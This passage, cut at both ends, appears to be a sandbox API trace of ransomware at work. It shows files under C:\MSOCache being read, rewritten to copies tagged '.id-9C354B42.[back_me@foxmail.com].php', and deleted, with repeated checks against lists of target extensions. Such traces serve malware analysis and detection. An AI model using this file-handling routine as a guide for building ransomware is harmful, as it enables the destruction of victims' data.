lpNumberOfBytesRead=0x332fed4*=0x61d, lpOverlapped=0x0) returned 1 [0034.707] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x620, lpOverlapped=0x0) returned 1 [0034.707] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.708] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0034.708] SetEndOfFile (hFile=0x16c) returned 1 [0034.708] CloseHandle (hObject=0x16c) returned 1 [0034.708] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.708] SetEndOfFile (hFile=0x168) returned 1 [0034.709] CloseHandle (hObject=0x168) returned 1 [0034.709] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.710] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml")) returned 1 [0034.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.710] lstrlenW (lpString=".doc") returned 4 [0034.710] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.710] lstrlenW (lpString=".docx") returned 5 [0034.710] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.710] lstrlenW (lpString=".pdf") returned 4 [0034.710] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.710] lstrlenW (lpString=".xls") returned 4 [0034.710] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.710] lstrlenW (lpString=".xlsx") returned 5 [0034.710] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.710] lstrlenW (lpString=".ppt") returned 4 [0034.710] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.710] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.710] lstrlenW (lpString=".zip") returned 4 [0034.710] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.710] lstrlenW (lpString=".rar") returned 4 [0034.710] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString=".bz2") returned 4 [0034.711] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString=".7z") returned 3 [0034.711] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.711] lstrlenW (lpString=".dbf") returned 4 [0034.711] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.711] lstrlenW (lpString=".1cd") returned 4 [0034.711] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.711] lstrlenW (lpString=".jpg") returned 4 [0034.711] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.711] lstrlenW (lpString=".doc") returned 4 [0034.711] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString=".docx") returned 5 [0034.711] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.711] lstrlenW (lpString=".pdf") returned 4 [0034.711] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString=".xls") returned 4 [0034.711] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString=".xlsx") returned 5 [0034.711] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.711] lstrlenW (lpString=".ppt") returned 4 [0034.711] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.711] lstrlenW (lpString=".zip") returned 4 [0034.711] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.711] lstrlenW (lpString=".rar") returned 4 [0034.711] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.711] lstrlenW (lpString=".bz2") returned 4 [0034.712] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.712] lstrlenW (lpString=".7z") returned 3 [0034.712] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.712] lstrlenW (lpString=".dbf") returned 4 [0034.712] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.712] lstrlenW (lpString=".1cd") returned 4 [0034.712] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml") returned 75 [0034.712] lstrlenW (lpString=".jpg") returned 4 [0034.712] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.712] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.712] lstrlenW (lpString="Setup.xml") returned 9 [0034.712] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.713] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=2296) returned 1 [0034.713] CloseHandle (hObject=0x168) returned 1 [0034.713] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.713] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.713] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.714] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.714] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.714] GetLastError () returned 0x0 [0034.714] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0034.715] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x900, lpOverlapped=0x0) returned 1 [0034.716] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.716] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.716] SetEndOfFile (hFile=0x16c) returned 1 [0034.716] CloseHandle (hObject=0x16c) returned 1 [0034.717] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.717] SetEndOfFile (hFile=0x168) returned 1 [0034.718] CloseHandle (hObject=0x168) returned 1 [0034.718] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.718] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.718] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.718] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.718] lstrlenW (lpString=".doc") returned 4 [0034.718] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.718] lstrlenW (lpString=".docx") returned 5 [0034.719] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.719] lstrlenW (lpString=".pdf") returned 4 [0034.719] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString=".xls") returned 4 [0034.719] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString=".xlsx") returned 5 [0034.719] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.719] lstrlenW (lpString=".ppt") returned 4 [0034.719] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.719] lstrlenW (lpString=".zip") returned 4 [0034.719] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.719] lstrlenW (lpString=".rar") returned 4 [0034.719] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString=".bz2") returned 4 [0034.719] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString=".7z") returned 3 [0034.719] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.719] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.719] lstrlenW (lpString=".dbf") returned 4 [0034.719] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.719] lstrlenW (lpString=".1cd") returned 4 [0034.719] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.719] lstrlenW (lpString=".jpg") returned 4 [0034.719] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.719] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.719] lstrlenW (lpString=".doc") returned 4 [0034.719] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.719] lstrlenW (lpString=".docx") returned 5 [0034.720] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.720] lstrlenW (lpString=".pdf") returned 4 [0034.720] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.720] lstrlenW (lpString=".xls") returned 4 [0034.720] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.720] lstrlenW (lpString=".xlsx") returned 5 [0034.720] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.720] lstrlenW (lpString=".ppt") returned 4 [0034.720] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.720] lstrlenW (lpString=".zip") returned 4 [0034.720] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.720] lstrlenW (lpString=".rar") returned 4 [0034.720] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.720] lstrlenW (lpString=".bz2") returned 4 [0034.720] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.720] lstrlenW (lpString=".7z") returned 3 [0034.720] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.720] lstrlenW (lpString=".dbf") returned 4 [0034.720] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.720] lstrlenW (lpString=".1cd") returned 4 [0034.720] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.720] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.720] lstrlenW (lpString=".jpg") returned 4 [0034.720] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.720] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.720] lstrlenW (lpString="PowerPointMUI.xml") returned 17 [0034.721] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.721] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1450) returned 1 [0034.721] CloseHandle (hObject=0x168) returned 1 [0034.721] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020 [0034.722] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0034.722] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0034.722] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.722] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.722] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0034.722] GetLastError () returned 0x0 [0034.722] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0034.724] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.724] ReadFile (in: hFile=0x168, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.724] WriteFile (in: hFile=0x16c, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0034.725] SetEndOfFile (hFile=0x16c) returned 1 [0034.725] CloseHandle (hObject=0x16c) returned 1 [0034.725] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.725] SetEndOfFile (hFile=0x168) returned 1 [0034.726] CloseHandle (hObject=0x168) returned 1 [0034.726] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0034.726] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0034.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.727] lstrlenW (lpString=".doc") returned 4 [0034.727] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString=".docx") returned 5 [0034.727] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.727] lstrlenW (lpString=".pdf") returned 4 [0034.727] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString=".xls") returned 4 [0034.727] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString=".xlsx") returned 5 [0034.727] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.727] lstrlenW (lpString=".ppt") returned 4 [0034.727] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.727] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.727] lstrlenW (lpString=".zip") returned 4 [0034.727] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.801] lstrlenW (lpString=".rar") returned 4 [0034.802] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString=".bz2") returned 4 [0034.802] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString=".7z") returned 3 [0034.802] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.802] lstrlenW (lpString=".dbf") returned 4 [0034.802] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.802] lstrlenW (lpString=".1cd") returned 4 [0034.802] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.802] lstrlenW (lpString=".jpg") returned 4 [0034.802] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.802] lstrlenW (lpString=".doc") returned 4 [0034.802] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString=".docx") returned 5 [0034.802] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.802] lstrlenW (lpString=".pdf") returned 4 [0034.802] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString=".xls") returned 4 [0034.802] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString=".xlsx") returned 5 [0034.802] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.802] lstrlenW (lpString=".ppt") returned 4 [0034.802] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.802] lstrlenW (lpString=".zip") returned 4 [0034.802] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.802] lstrlenW (lpString=".rar") returned 4 [0034.802] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.803] lstrlenW (lpString=".bz2") returned 4 [0034.803] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.803] lstrlenW (lpString=".7z") returned 3 [0034.803] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.803] lstrlenW (lpString=".dbf") returned 4 [0034.803] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.803] lstrlenW (lpString=".1cd") returned 4 [0034.803] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0034.803] lstrlenW (lpString=".jpg") returned 4 [0034.803] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.803] Sleep (dwMilliseconds=0x64) [0034.995] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0034.995] lstrlenW (lpString="Proof.xml") returned 9 [0034.995] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.259] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1457) returned 1 [0035.269] CloseHandle (hObject=0x1a8) returned 1 [0035.284] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 0x2020 [0035.284] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.284] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.284] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.284] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.284] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 